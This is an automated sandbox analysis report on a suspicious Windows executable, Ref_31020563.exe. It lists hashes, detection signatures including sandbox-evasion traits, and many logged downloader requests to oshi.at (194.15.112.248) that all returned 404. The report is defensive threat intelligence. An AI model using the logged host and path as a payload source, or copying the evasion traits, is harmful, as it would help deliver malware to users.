Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ref_31020563.exe

Overview

General Information

Sample name:Ref_31020563.exe
Analysis ID:1572489
MD5:7c8431a3c14296cff7381cc69b61bad8
SHA1:d3d20ede9527fdbeb8252118af55558037721630
SHA256:881d0d3e98524b861548955ed7ced7f91de3a39d50feb573896694188e7fecff
Tags:exeuser-TeamDreier
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for sample
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files

Classification

  • System is w10x64
  • Ref_31020563.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\Ref_31020563.exe" MD5: 7C8431A3C14296CFF7381CC69B61BAD8)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-10T16:27:29.576670+010028033053Unknown Traffic192.168.2.849714194.15.112.248443TCP
2024-12-10T16:27:32.526457+010028033053Unknown Traffic192.168.2.849715194.15.112.248443TCP
2024-12-10T16:27:35.369134+010028033053Unknown Traffic192.168.2.849716194.15.112.248443TCP
2024-12-10T16:27:38.316628+010028033053Unknown Traffic192.168.2.849717194.15.112.248443TCP
2024-12-10T16:27:41.249915+010028033053Unknown Traffic192.168.2.849718194.15.112.248443TCP
2024-12-10T16:27:44.172445+010028033053Unknown Traffic192.168.2.849721194.15.112.248443TCP
2024-12-10T16:27:47.152636+010028033053Unknown Traffic192.168.2.849722194.15.112.248443TCP
2024-12-10T16:27:49.988251+010028033053Unknown Traffic192.168.2.849723194.15.112.248443TCP
2024-12-10T16:27:52.919141+010028033053Unknown Traffic192.168.2.849724194.15.112.248443TCP
2024-12-10T16:27:55.868078+010028033053Unknown Traffic192.168.2.849725194.15.112.248443TCP
2024-12-10T16:27:58.769686+010028033053Unknown Traffic192.168.2.849726194.15.112.248443TCP
2024-12-10T16:28:01.651132+010028033053Unknown Traffic192.168.2.849727194.15.112.248443TCP
2024-12-10T16:28:04.541632+010028033053Unknown Traffic192.168.2.849728194.15.112.248443TCP
2024-12-10T16:28:07.439598+010028033053Unknown Traffic192.168.2.849729194.15.112.248443TCP
2024-12-10T16:28:10.362142+010028033053Unknown Traffic192.168.2.849730194.15.112.248443TCP
2024-12-10T16:28:13.255533+010028033053Unknown Traffic192.168.2.849731194.15.112.248443TCP
2024-12-10T16:28:16.139650+010028033053Unknown Traffic192.168.2.849732194.15.112.248443TCP
2024-12-10T16:28:19.004117+010028033053Unknown Traffic192.168.2.849733194.15.112.248443TCP
2024-12-10T16:28:21.900347+010028033053Unknown Traffic192.168.2.849735194.15.112.248443TCP
2024-12-10T16:28:24.793119+010028033053Unknown Traffic192.168.2.849736194.15.112.248443TCP
2024-12-10T16:28:27.680746+010028033053Unknown Traffic192.168.2.849737194.15.112.248443TCP
2024-12-10T16:28:30.557000+010028033053Unknown Traffic192.168.2.849738194.15.112.248443TCP
2024-12-10T16:28:33.416773+010028033053Unknown Traffic192.168.2.849739194.15.112.248443TCP
2024-12-10T16:28:36.346856+010028033053Unknown Traffic192.168.2.849740194.15.112.248443TCP
2024-12-10T16:28:39.176510+010028033053Unknown Traffic192.168.2.849741194.15.112.248443TCP
2024-12-10T16:28:42.030234+010028033053Unknown Traffic192.168.2.849742194.15.112.248443TCP
2024-12-10T16:28:45.034408+010028033053Unknown Traffic192.168.2.849743194.15.112.248443TCP
2024-12-10T16:28:47.921613+010028033053Unknown Traffic192.168.2.849744194.15.112.248443TCP
2024-12-10T16:28:51.845244+010028033053Unknown Traffic192.168.2.849745194.15.112.248443TCP
2024-12-10T16:28:54.729587+010028033053Unknown Traffic192.168.2.849746194.15.112.248443TCP
2024-12-10T16:28:57.617140+010028033053Unknown Traffic192.168.2.849747194.15.112.248443TCP
2024-12-10T16:29:00.497997+010028033053Unknown Traffic192.168.2.849748194.15.112.248443TCP
2024-12-10T16:29:03.373393+010028033053Unknown Traffic192.168.2.849749194.15.112.248443TCP
2024-12-10T16:29:06.254399+010028033053Unknown Traffic192.168.2.849750194.15.112.248443TCP
2024-12-10T16:29:09.166355+010028033053Unknown Traffic192.168.2.849751194.15.112.248443TCP
2024-12-10T16:29:12.107042+010028033053Unknown Traffic192.168.2.849752194.15.112.248443TCP
2024-12-10T16:29:15.519764+010028033053Unknown Traffic192.168.2.849753194.15.112.248443TCP
2024-12-10T16:29:18.516274+010028033053Unknown Traffic192.168.2.849754194.15.112.248443TCP
2024-12-10T16:29:21.422261+010028033053Unknown Traffic192.168.2.849755194.15.112.248443TCP
2024-12-10T16:29:24.320843+010028033053Unknown Traffic192.168.2.849756194.15.112.248443TCP
2024-12-10T16:29:27.272943+010028033053Unknown Traffic192.168.2.849757194.15.112.248443TCP
2024-12-10T16:29:30.163523+010028033053Unknown Traffic192.168.2.849758194.15.112.248443TCP
2024-12-10T16:29:33.137370+010028033053Unknown Traffic192.168.2.849759194.15.112.248443TCP
2024-12-10T16:29:36.051646+010028033053Unknown Traffic192.168.2.849760194.15.112.248443TCP
2024-12-10T16:29:38.891899+010028033053Unknown Traffic192.168.2.849761194.15.112.248443TCP
2024-12-10T16:29:41.778174+010028033053Unknown Traffic192.168.2.849762194.15.112.248443TCP
2024-12-10T16:29:44.669988+010028033053Unknown Traffic192.168.2.849763194.15.112.248443TCP
2024-12-10T16:29:47.540314+010028033053Unknown Traffic192.168.2.849764194.15.112.248443TCP
2024-12-10T16:29:50.435955+010028033053Unknown Traffic192.168.2.849765194.15.112.248443TCP
2024-12-10T16:29:53.312188+010028033053Unknown Traffic192.168.2.849766194.15.112.248443TCP
2024-12-10T16:29:56.201449+010028033053Unknown Traffic192.168.2.849767194.15.112.248443TCP
2024-12-10T16:29:59.185829+010028033053Unknown Traffic192.168.2.849768194.15.112.248443TCP
2024-12-10T16:30:02.079464+010028033053Unknown Traffic192.168.2.849769194.15.112.248443TCP
2024-12-10T16:30:04.971373+010028033053Unknown Traffic192.168.2.849770194.15.112.248443TCP
2024-12-10T16:30:08.144659+010028033053Unknown Traffic192.168.2.849771194.15.112.248443TCP
2024-12-10T16:30:10.962597+010028033053Unknown Traffic192.168.2.849772194.15.112.248443TCP
2024-12-10T16:30:13.861298+010028033053Unknown Traffic192.168.2.849773194.15.112.248443TCP
2024-12-10T16:30:16.740159+010028033053Unknown Traffic192.168.2.849774194.15.112.248443TCP
2024-12-10T16:30:19.661631+010028033053Unknown Traffic192.168.2.849775194.15.112.248443TCP
2024-12-10T16:30:22.805932+010028033053Unknown Traffic192.168.2.849776194.15.112.248443TCP
2024-12-10T16:30:25.705370+010028033053Unknown Traffic192.168.2.849777194.15.112.248443TCP
2024-12-10T16:30:28.588814+010028033053Unknown Traffic192.168.2.849778194.15.112.248443TCP
2024-12-10T16:30:31.493402+010028033053Unknown Traffic192.168.2.849779194.15.112.248443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Ref_31020563.exeReversingLabs: Detection: 36%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: Ref_31020563.exeJoe Sandbox ML: detected
Source: Ref_31020563.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: Ref_31020563.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: Joe Sandbox ViewIP Address: 194.15.112.248 194.15.112.248
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49714 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49738 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49731 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49739 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49717 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49752 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49729 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49740 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49746 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49718 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49733 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49722 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49727 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49778 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49772 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49769 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49750 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49779 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49751 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49725 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49724 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49742 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49754 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49726 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49775 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49732 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49736 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49777 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49764 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49774 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49745 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49776 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49723 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49753 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49728 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49748 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49768 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49747 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49716 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49749 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49741 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49730 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49758 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49721 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49761 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49763 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49765 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49743 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49757 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49773 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49737 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49767 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49756 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49762 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49755 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49771 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49744 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49735 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49766 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49770 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49759 -> 194.15.112.248:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49760 -> 194.15.112.248:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /AQBP HTTP/1.1Host: oshi.at
Source: global trafficDNS traffic detected: DNS query: oshi.at
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:26 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:29 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:32 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:35 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:38 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:40 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:43 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
